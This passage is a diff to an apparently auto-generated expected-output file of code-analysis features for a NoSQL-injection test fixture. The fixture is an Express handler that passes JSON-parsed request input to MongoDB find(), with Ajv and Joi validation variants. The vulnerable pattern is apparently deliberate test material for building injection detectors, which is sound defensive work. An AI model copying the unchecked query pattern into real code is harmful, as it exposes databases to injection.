autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:35:9:35:23 | doc.find(query) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:35:9:35:23 | doc.find(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:35:9:35:23 | doc.find(query) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:35:9:35:23 | exceptional return of doc.find(query) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:35:9:35:23 | exceptional return of doc.find(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:35:9:35:23 | exceptional return of doc.find(query) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:35:9:35:23 | exceptional return of doc.find(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:35:9:35:23 | exceptional return of doc.find(query) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:35:13:35:16 | find | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:35:13:35:16 | find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:35:13:35:16 | find | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:35:13:35:16 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:35:13:35:16 | find | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:35:18:35:22 | query | CalleeFlexibleAccessPath | doc.find | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:35:18:35:22 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:35:18:35:22 | query | contextFunctionInterfaces | validate(x) | @@ -726,6 +4150,55 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:35:18:35:22 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:35:18:35:22 | query | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:35:18:35:22 | query | receiverName | doc | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:39:1:39:22 | import ... 'joi'; | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:39:1:39:22 | import ... 'joi'; | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:39:1:39:22 | import ... 'joi'; | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:39:8:39:10 | Joi | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:39:8:39:10 | Joi | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:39:8:39:10 | Joi | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:39:8:39:10 | Joi | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:39:8:39:10 | Joi | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:39:8:39:10 | Joi | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:39:8:39:10 | Joi | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:39:8:39:10 | Joi | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:39:8:39:10 | Joi | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:39:17:39:21 | 'joi' | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:39:17:39:21 | 'joi' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:39:17:39:21 | 'joi' | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:7:41:15 | joiSchema | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:7:41:15 | joiSchema | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:7:41:15 | joiSchema | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:7:41:15 | joiSchema | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:7:44:24 | joiSche ... title') | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:7:44:24 | joiSche ... title') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:7:44:24 | joiSche ... title') | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:7:44:24 | joiSchema | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:7:44:24 | joiSchema | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:7:44:24 | joiSchema | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:19:41:21 | Joi | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:19:41:21 | Joi | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:19:41:21 | Joi | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:19:41:28 | Joi.object | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:19:41:28 | Joi.object | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:19:41:28 | Joi.object | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:19:44:2 | Joi.obj ... ed()\\n}) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:19:44:2 | Joi.obj ... ed()\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:19:44:2 | Joi.obj ... ed()\\n}) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:19:44:2 | exceptional return of Joi.obj ... ed()\\n}) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:19:44:2 | exceptional return of Joi.obj ... ed()\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:19:44:2 | exceptional return of Joi.obj ... ed()\\n}) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:19:44:7 | Joi.obj ... }).with | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:19:44:7 | Joi.obj ... }).with | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:19:44:7 | Joi.obj ... }).with | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:19:44:24 | Joi.obj ... title') | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:19:44:24 | Joi.obj ... title') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:19:44:24 | Joi.obj ... title') | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:19:44:24 | exceptional return of Joi.obj ... title') | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:19:44:24 | exceptional return of Joi.obj ... title') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:19:44:24 | exceptional return of Joi.obj ... title') | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:23:41:28 | object | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:23:41:28 | object | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:23:41:28 | object | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:30:44:1 | {\\n d ... red()\\n} | CalleeFlexibleAccessPath | Joi.object | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:30:44:1 | {\\n d ... red()\\n} | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:30:44:1 | {\\n d ... red()\\n} | calleeImports | joi | @@ -733,6 +4206,30 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:30:44:1 | {\\n d ... red()\\n} | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:30:44:1 | {\\n d ... red()\\n} | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:41:30:44:1 | {\\n d ... red()\\n} | receiverName | Joi | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:5:42:8 | date | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:5:42:8 | date | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:5:42:8 | date | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:5:42:33 | date: J ... uired() | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:5:42:33 | date: J ... uired() | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:5:42:33 | date: J ... uired() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:5:42:33 | date: J ... uired() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:5:42:33 | date: J ... uired() | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:5:42:33 | date: J ... uired() | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:11:42:13 | Joi | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:11:42:13 | Joi | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:11:42:13 | Joi | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:11:42:20 | Joi.string | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:11:42:20 | Joi.string | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:11:42:20 | Joi.string | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:11:42:22 | Joi.string() | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:11:42:22 | Joi.string() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:11:42:22 | Joi.string() | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:11:42:22 | exceptional return of Joi.string() | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:11:42:22 | exceptional return of Joi.string() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:11:42:22 | exceptional return of Joi.string() | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:11:42:31 | Joi.str ... equired | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:11:42:31 | Joi.str ... equired | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:11:42:31 | Joi.str ... equired | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:11:42:33 | Joi.str ... uired() | CalleeFlexibleAccessPath | Joi.object | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:11:42:33 | Joi.str ... uired() | InputAccessPathFromCallee | 0.date | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:11:42:33 | Joi.str ... uired() | InputArgumentIndex | 0 | @@ -741,6 +4238,39 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:11:42:33 | Joi.str ... uired() | contextFunctionInterfaces | validate(x) | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:11:42:33 | Joi.str ... uired() | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:11:42:33 | Joi.str ... uired() | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:11:42:33 | exceptional return of Joi.str ... uired() | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:11:42:33 | exceptional return of Joi.str ... uired() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:11:42:33 | exceptional return of Joi.str ... uired() | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:15:42:20 | string | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:15:42:20 | string | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:15:42:20 | string | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:24:42:31 | required | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:24:42:31 | required | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:42:24:42:31 | required | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:5:43:9 | title | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:5:43:9 | title | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:5:43:9 | title | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:5:43:34 | title: ... uired() | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:5:43:34 | title: ... uired() | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:5:43:34 | title: ... uired() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:5:43:34 | title: ... uired() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:5:43:34 | title: ... uired() | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:5:43:34 | title: ... uired() | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:12:43:14 | Joi | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:12:43:14 | Joi | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:12:43:14 | Joi | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:12:43:21 | Joi.string | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:12:43:21 | Joi.string | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:12:43:21 | Joi.string | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:12:43:23 | Joi.string() | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:12:43:23 | Joi.string() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:12:43:23 | Joi.string() | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:12:43:23 | exceptional return of Joi.string() | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:12:43:23 | exceptional return of Joi.string() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:12:43:23 | exceptional return of Joi.string() | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:12:43:32 | Joi.str ... equired | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:12:43:32 | Joi.str ... equired | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:12:43:32 | Joi.str ... equired | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:12:43:34 | Joi.str ... uired() | CalleeFlexibleAccessPath | Joi.object | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:12:43:34 | Joi.str ... uired() | InputAccessPathFromCallee | 0.title | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:12:43:34 | Joi.str ... uired() | InputArgumentIndex | 0 | @@ -749,6 +4279,18 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:12:43:34 | Joi.str ... uired() | contextFunctionInterfaces | validate(x) | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:12:43:34 | Joi.str ... uired() | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:12:43:34 | Joi.str ... uired() | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:12:43:34 | exceptional return of Joi.str ... uired() | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:12:43:34 | exceptional return of Joi.str ... uired() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:12:43:34 | exceptional return of Joi.str ... uired() | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:16:43:21 | string | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:16:43:21 | string | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:16:43:21 | string | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:25:43:32 | required | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:25:43:32 | required | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:43:25:43:32 | required | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:44:4:44:7 | with | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:44:4:44:7 | with | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:44:4:44:7 | with | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:44:9:44:14 | 'date' | CalleeFlexibleAccessPath | Joi.object().with | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:44:9:44:14 | 'date' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:44:9:44:14 | 'date' | calleeImports | joi | @@ -761,6 +4303,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:44:17:44:23 | 'title' | contextFunctionInterfaces | validate(x) | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:44:17:44:23 | 'title' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:44:17:44:23 | 'title' | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:1:46:3 | app | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:1:46:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:1:46:3 | app | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:1:46:8 | app.post | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:1:46:8 | app.post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:1:46:8 | app.post | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:1:64:2 | app.pos ... });\\n}) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:1:64:2 | app.pos ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:1:64:2 | app.pos ... });\\n}) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:1:64:2 | exceptional return of app.pos ... });\\n}) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:1:64:2 | exceptional return of app.pos ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:1:64:2 | exceptional return of app.pos ... });\\n}) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:5:46:8 | post | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:5:46:8 | post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:5:46:8 | post | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:10:46:28 | '/documents/insert' | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:10:46:28 | '/documents/insert' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:10:46:28 | '/documents/insert' | calleeImports | express | @@ -768,6 +4325,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:10:46:28 | '/documents/insert' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:10:46:28 | '/documents/insert' | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:10:46:28 | '/documents/insert' | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:31:46:30 | MongoClient | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:31:46:30 | MongoClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:31:46:30 | MongoClient | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:31:46:30 | MongoClient | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:31:46:30 | MongoClient | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:31:46:31 | req | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:31:46:31 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:31:46:31 | req | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:31:46:31 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:31:46:31 | req | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:31:64:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:31:64:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:31:64:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:31:64:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:31:64:1 | 'arguments' object of anonymous function | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:31:64:1 | (req, r ... });\\n} | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:31:64:1 | (req, r ... });\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:31:64:1 | (req, r ... });\\n} | calleeImports | express | @@ -775,6 +4347,59 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:31:64:1 | (req, r ... });\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:31:64:1 | (req, r ... });\\n} | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:31:64:1 | (req, r ... });\\n} | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:31:64:1 | exceptional return of anonymous function | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:31:64:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:31:64:1 | exceptional return of anonymous function | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:31:64:1 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:31:64:1 | exceptional return of anonymous function | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:31:64:1 | return of anonymous function | contextFunctionInterfaces | validate(x) | 